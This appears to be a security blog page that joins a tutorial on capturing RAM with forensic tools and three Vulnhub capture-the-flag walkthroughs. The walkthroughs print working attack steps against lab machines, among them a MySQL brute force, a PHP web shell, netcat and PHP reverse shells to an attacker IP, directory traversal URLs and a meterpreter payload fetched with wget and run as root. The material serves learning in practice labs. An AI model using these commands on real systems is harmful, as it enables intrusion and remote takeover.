Multi ways to Capture the Memory for Analysis

In this article we will going to learn the how to capture the RAM memory for analysis, there is various ways to do it and let take some time and learn all those different circumstances call for a different measure.

What is RAM?

RAM is short for Random Access Memory. It is referred to as main memory of a computer which makes it quite important for a computer to run. RAM allows the user to temporarily story data in the system which one is using or is about to use. But as RAM is volatile, all the data stored in RAM will be lost as soon as the power goes out. RAM is both readable and writable which make it easy to access and user friendly. The importance of RAM is that it makes you system faster as storing in your hard drive takes a lot of time as well as a toll on your system. RAM is also useful to save and redeem data from the system. All in all, you can conclude that RAM helps to improve the performance of your device.

Benefits for capture the memory

Capturing RAM important task as over the time investigators have realized that many types of facts can be covered in volatile memory and evidence can beneficial in an investigation and which can further allow an investigator to understand what applications were being used by a suspect or at the time of attack. It can also be possible that remote attackers would have some stored data, tools in RAM rather than on the system.

Some tools can do that work   

Dumpit

MoonSols DumpIt it is a fusion of Windows 32 bit and Windows 64 bit in one executable, no questions are asked to the user end.

We can download the Dumpit software from here

It is a compact tool that can make it easy to save the contents of your systems RAM. It’s a console utility but no need to open command line or master a host command line switch. Instead, all we need do it is Only a double click on the executable is enough to generate a copy of the physical memory in the current directory.

As we can see in the above image this tool is already providing us the destination of the image that we are going to create by this process and asking us at the user end we want to continue or not.

If we want to continue then we have to press “y”.

If we start the process then after completing the process it shows the message if we got succeeds it shows the message “success”.

Now we can check the path which were given by the software whether we are able to capture the RAM or not.

Now we can see that our captured memory which is known as the RAM image is successfully created.

Magnet Forensics  

Magnet Forensics is a free RAM capturing or memory imaging tool which is used to capture the physical memory of suspects system, allows investigators to analyse and recover the valuable facts that are only found in memory of the system.

We can download the software from here.

Magnet Ram capture has a small memory footprint, that means investigator can run the tool while data is overwritten in memory. We can capture memory data in Raw (.DMP/.RAW/.BIN) format and easily analyse them.

This image can be used as evidence in the forensic investigation. Some evidence that can be found in the RAM are processes, program running on the system, network connections, evidence of malware intrusion, registry hives, usernames & passwords, decrypted files and keys etc.

Now we can start the Ram capturing process by just executing the software by clicking on it.

Now we can see that our captured memory which is known as the RAM image is successfully created.

As we can see in the above image we have to provide the name of memory image and the format in which we want to capture the memory image.

After providing the above details now our process of capturing the memory image is started it depends on the size of the memory how much time it takes to complete the process.

After completing the process, it shows a pop-up message which indicates the process is successful and provides us the path location were our captured memory is located which we were provided earlier by us.

Now we can check our located path whether our memory image got generated or not as we can see in the above image that our image is successfully created now, we can analyse that memory image.

Access data FTK imager

FTK imager can create the live memory image and paging file for both windows 32bit and 64bit systems. We can download the FTK imager from here and install in our system. The main purpose of building the FTK imager is to process and index data upfront and try to eliminate wasted time for searches to execute. No matter how many different data we are dealing with or amount of data we have to go through, FTK get us their quicker and better than anything else.

Now start the software of the access data FTK imager

Now to start the we need to click on the file button as shown in the above image.

After clicking on the file button our screen would look like this. Now we need to search the capture memory button and click on that button for the start of the capture memory process.

After that now we need to provide some information regarding that image like the destination path of the memory image, the file name of the memory image and we want to include its page file and AD1 file or not.

After providing that information it shows that our process got started along with that it also consistently the status of our process and the final destination or path was our image going to save.

After completing its shows, us the message which says “Memory capture finished successfully” and our memory image location or destination.

Now we are going to check on that location whether our image is saved or not, but as we can see in the above image that we were able to capture the memory image successfully.

Belkasoft Live RAM Capturer

It is a free forensic tool to reliably extract the all content of the system volatile memory, even if it was protected by some active anti-debugging system. Were its separate 32bit and 64bit builds are available to minimize the tool footprint as much as possible.

Memory dumps captured with Belkasoft live ram capturer these live rams captured can be analyzed with any RAM analysis software.

But First, we need to download Belkasoft Live RAM capturer from here and install in our system.

Then open this software and select the path where we want to save our memory image and Click on the capture button.

After providing all the details it starts to load its drivers to start the process of capturing the memory image, now it shows the active live progression of the task given by us to capture the memory image.

 

After completing the overall process, it completes it’s active progression by touching on the right side of its wall and provide us some sneak peeks of our captured memory and suggests to us its image analyser from belkasoft and also provides its link to download it.

Now we need to check whether our memory will be captured or not. As we can see in the image given below, we succeed in our process.

These are some ways or tools to capture the live memory image for analysing it for searching some evidence through it to help in the investigation of an investigator in his cases.

Sunset: dusk: Vulnhub Walkthrough

Sunset: dusk is another CTF challenge given by vulnhub and the level difficultly is set according to beginners and credit goes to whitecr0wz. You have to hunt two flags, and this is a boot to root challenge. Download it from here.

Penetration Testing Methologies

Network scaning

·        Nmap

·        Netdiscover

Enumeration

·        Weak credentials

·        PHP file injection

Exploiting RCE

Privilege Escalation

·        Sudo rights

·        Docker

Walkthrough

Network Scanning

First of all, we try to identify our target. We did this using the netdiscover command.

Now that we have identified our target using the above command, we can continue to our next step i.e. scanning the host IP to identify open ports and running services. We will use Nmap to scan the target with the following command:

nmap -A 192.168.1.167

As result we found multiple open ports and services are running across them thus, we need to enumerate further to step ahead.

Enumeration

We’ve start the enumeration with FTP and HTTP and tried to find some suspicious information but unfortunately fail to get any remarkable clue thus we tried for mysql brute force attack with the help of hydra using rockyou.txt file.

hydra -l root -P /usr/share/wordlists/rockyou.txt  192.168.1.167 mysql

And we found the login creds for mysql where username is root and password is password which also considered as weak credential.

We also navigate to port 8080 and it looks like, that page is displaying the list of the current directory, here author has left the hint for writable directory /var/tmp.  Thus, it become easy for us deface the machine using these loopholes.

Since we have mysql cred and we also know the working directory is /var/tmp and with the help of this we can inject malicious PHP code as SQL query into a file named “raj.php”. This will generate an RCE and as result we will be able to spawn host machine by exploiting it. 

select “” into outfile ‘/var/tmp/raj.php’ ;

So, again we navigate to port 8080 and saw the entry for raj.php file.

It was time to execute raj.php and verify the RCE parameter by executing following URL:

http://192.168.1.167:8080/raj.php?cmd=id

Thus, we find that we are able to run system command through this page.

Exploiting

It was time to exploit RCE, thus we used the netcat reverse shell to spawning shell o host machine.

http://192.168.1.167:8080/raj.php?cmd=nc -e /bin/bash 192.168.1.107 1234

Bravo!! We hit the goal and spawn the shell of host the machine and found the 1^st flag user.txt in the /home/dusk.

Privilege Escalation

Further we move towards privilege escalation and identify the sudo rights for www-data and notice that user:www-data holds sudo rights for “make” & “sl” program but here we try to escalate to shell for user:dusk by exploiting make program.

COMMAND='/bin/sh'

sudo -u make -s --eval=$'x:\n\t-'"$COMMAND”

After executing above command, we were able to access the host shell as user dusk who is also the member of the docker group.

Me and My Girlfreinds: Vulnhub Walkthrough

Me and My Girlfriends is another CTF challenge given by vulnhub and the level difficultly is set according to beginners. You have to hunt two flags, and this is a boot to root challenge.

According to author: This VM tells us that there are a couple of lovers namely Alice and Bob, where the couple was originally very romantic, but since Alice worked at a private company, "Ceban Corp", something has changed from Alice's attitude towards Bob like something is "hidden", And Bob asks for your help to get what Alice is hiding and get full access to the company.

Download it from here.

Penetration Testing Methodologies

Network Scanning

·        Netdiscover

·        Nmap

Enumeration

·        Burp Suite

Spawning shell

·        ssh

Privilege Escalations

·        Sudo right

Walkthrough

Network Scaning

First of all, we try to identify our target. We did this using the netdiscover command.

Now that we have identified our target using the above command, we can continue to our next step i.e. scanning the host IP to identify open ports and running services. We will use Nmap to scan the target with the following command:

nmap -A 192.168.29.101

We found port 22, 80 are open for ssh and HTTP respectively, let’s go for enumeration.

Enumeration

When you will explore machine IP in the web browser, you will see a message “this site can only be accessed local” which is a hint given by author that means the wep page will be accessible locally.

Then I check for source page and notice the comment “to use x-forwarded-for header” to access the page, here we can say that there is possibility of host header injection 😊.

Without wasting time, I had edited the rule for the request header for x-forwarded-for: localhost in the burp suite and try to intercept the web page request along this.

Once you have intercepted request, further you need to forward this request again and again till you receive the response on the web browser.

And finally, you will be able to access the web page for the Ceban Corp company as said by author. At this page I saw 4 captions that contains some hyperlink. Here I tried to figure out the possibilities for sql injection and LFI but failed to bypass this.

Since I was failed to enumerate any vulnerability, thus, register a new account by name of raj.

Then login as raj to investigate further.

Once I logged in, I saw another their three captions “Dashboard, Profile, logout”. The profile caption denoted user_id and for raj it is showing user-id=12 in the URL.

In the given URL, I tried to change user_id from user_id=12 to user-id=1 and luckily I saw  the profile for another user, then frequently found profile for alice as user_id=5, Moreover the password field was auto filed thus I was able to read the password from inside the inspect element.

Thus, I have following creds:

Username: alice

Password: 4lic3

Spwaning shell

Since we have enumerated credential for the user alice therefore, further I used this credential to access host machine shell through ssh.

ssh alice@192.168.29.128

After spawning pty shell of the host machine, I looked for directory list where I found a hidden folder named as “.my_secret” which contains two files: flag1.txt and my_notes.txt.

Thus, we have found 1^st flag, now let’s move forward for privilege escalation and capture the 2^nd flag.

Privilege Escalation

Without wasting time, I looked for sudo rights and fortunately found that alice can run the php program as sudo user. Then I start the netcat listener in a new terminal and run the php reverse shell command in the host terminal.

sudo /usr/bin/php -r '$sock=fsockopen("192.168.29.157",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

Boomm!! We got the root shell through netcat session and inside the root we found the final flag.

nc -lvp 1234

cd /root

ls

cat flag2.txt

Sunset-Sunrise: Vulnhub Walkthrough

In this article, we are going to crack the Sunset: sunrise Boot to Root Challenge and present a detailed walkthrough. The machine depicted in this Walkthrough is hosted on Vulnhub. Credit for making this machine goes to whitecr0wz. Download this lab by clicking here.

Penetration Testing Methodology

·        Network Scanning

o   Netdiscover Scan

o   Nmap Scan

·        Enumeration

o   Browsing HTTP Service

o   Directory Bruteforce using dirb

o   Enumeration using Searchsploit

·        Exploitation

o   Exploiting the Directory Traversal

o   Reading of User Flag

o   Connection via SSH

o   Enumeration of MySQL Service

·        Post Exploitation

o   Enumeration for Sudo Permissions

o   Generation of payload using MSFPC

o   Transferring payload to Target Machine

o   Reading Root Flag

Walkthrough

Network Scanning

After running the downloaded virtual machine in the VMWare, the machine will automatically be assigned an IP address from the network DHCP, find the IP address of our target machine and for that please use the following command as it helps to see all the IP’s in an internal network:

netdiscover

We found the target IP Address 192.168.1.197. The next step is to scan the target machine by using the Nmap tool. This is to find the open ports and services on the target machine and will help us to proceed further.

nmap -A 192.168.1.197

Here we performed an Aggressive Port Scan because we wanted to grab all the information. After the scan, we saw that port 22 was actively running the OpenSSH We also have the on port 80 with Apache http with mysql running on 3306. We also see that there is some kind of proxy running on the port 8080. This was the lay of the ground. Now let’s get to the enumeration.

Enumeration

We started from port 80 and tried to browse the webpage on out browser. Much to our dismay it didn’t contained anything interesting. The port 8080 on the other had piqued our interest. So, we decide to take a look at it.

http://192.168.1.197:8080

We see that we have a directory listing with a sweet little footnote claiming that Weborf is running on this machine. We also got the version information from too. This server a good example of why information disclosure is a vulnerability.

Now without moving around much we decided to search the Weborf using searchsploit. If we don’t get a hit, then we will try something else. But we got a successful hit. It said that this version of the Weborf is vulnerable to Directory Traversal Exploit. This could be our way in. We downloaded the exploit contents on out attacker machine to get a read on this. The exploit gives us the path that is vulnerable. Let’s try that on out Target Machine.

searchsploit Weborf 0.12.2

searchsploit -m 14925

cat 14925.txt

We went to our Web Browser and in the URL, we inject the line that was mentioned in the exploit. And figures that this machine is indeed vulnerable to Directory Traversal. We can read the /etc/passwd file.

Now that we have a method to look around for files inside the target machine. We decided to take a loot at the user sunrise’s home directory. We can see that we have a user.txt file.

We open the user.txt file to find this text as shown below. That seems like a simple user flag. That’s charming.

Now although it seemed like a dead end, we decided to enumerate the target machine further using Directory Traversal. We made our way to the user Weborf user’s home directory.

Now instead of heading inside directly we decided to make an automated approach. It’s time for a Directory Bruteforce. We will use the dirb tool for this purpose. Within minutes we get the hidden file named .mysql history.

dirb http://192.168.1.197:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..home%2fweborf%2f

 

As this file might contain some useful information, we decided to take a look. We see that it has a query that contains the user login credentials of Weborf. Yes!! Let’s try to get in.

http://192.168.1.197:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..home%2fweborf%2f/.mysql history

Exploitation

We have successfully gained the credentials of the user Weborf. Since from the earlier nmap scan we saw that we have a ssh port open, let’s try to ssh our way in. After getting in the target machine, we started the enumeration based on the information we had from our initial scanning that there is a mysql service runnimg on the system. We login it to mysql using the Weborf credentials. We run the show databases; command to get the names of databases.

ssh weborf@192.168.1.197

iheartrainbows44

mysql -u weborf -p

show databases;

We decided to enumerate database named mysql. We selected mysql database and started to look at the tables that were created inside this database. Among some tables we see that we have a table called user. That’s looks important.

use mysql;

show tables;

Upon a closer look at the user table, we see that we have an entry in the user table that consists of the credentials of another user named sunrise. It is “thefutureissobrightigottawearshades”. Well, a person keeping this kind of passwords don’t have bright future.

We tried to login as the user sunrise with the password that we found earlier. After logging in we try to find improper sudo permissions. Upon close inspection we see that the user sunrise can run wine service with root privileges. This kind of got use thinking because this kind of scenario we haven’t faced earlier. Kudos to the Lab author for thinking out of the box here.

su sunrise

sudo -l

cd /tmp

Post Exploitation                                                                          

Now we could go on and on about the libraries but as this is a CTF Challenge, we try to explain as shortly as possible.

Wine (recursive backronym for Wine Is Not an Emulator) is a free and open-source compatibility layer that aims to allow computer programs (application software and computer games) developed for Microsoft Windows to run on Unix-like operating systems.

Now as we can run wine as root, we will create a payload that can be executed using wine. We will be using msfpc for the payload creation. After creating the payload, we will run the python one liner for transferring the payload to the target machine.

msfpc windows 192.168.1.107

python2 -m SimpleHTTPServer 8080

Since we have hosted the payload on the attacker machine, we will use the wget tool for downloading the said file to the target machine. After the successful transfer of the payload to the target machine we will be executing the payload using wine along with sudo.

wget http://192.168.1.107:8080/windows-meterpreter-staged-reverse-tcp-443.exe

sudo wine windows-meterpreter-staged-reverse-tcp-443.exe

When we used the msfpc tool to generate the payload, a Metasploit Framework ruby file is also generated with the configuration that is required to run the listener for the payload. We ran that ruby file and when we ran the file using wine on that target machine. We see that a meterpreter session pops up. As the file was executed with wine which was had root privileges the shell, we got was root as well.  We traverse into the root directory and when we list all the files inside this directory, we see that we find a file named root.txt.

session 1

cd /root

ls

Let’s read the root flag and conclude this CTF Challenge.

cat root.txt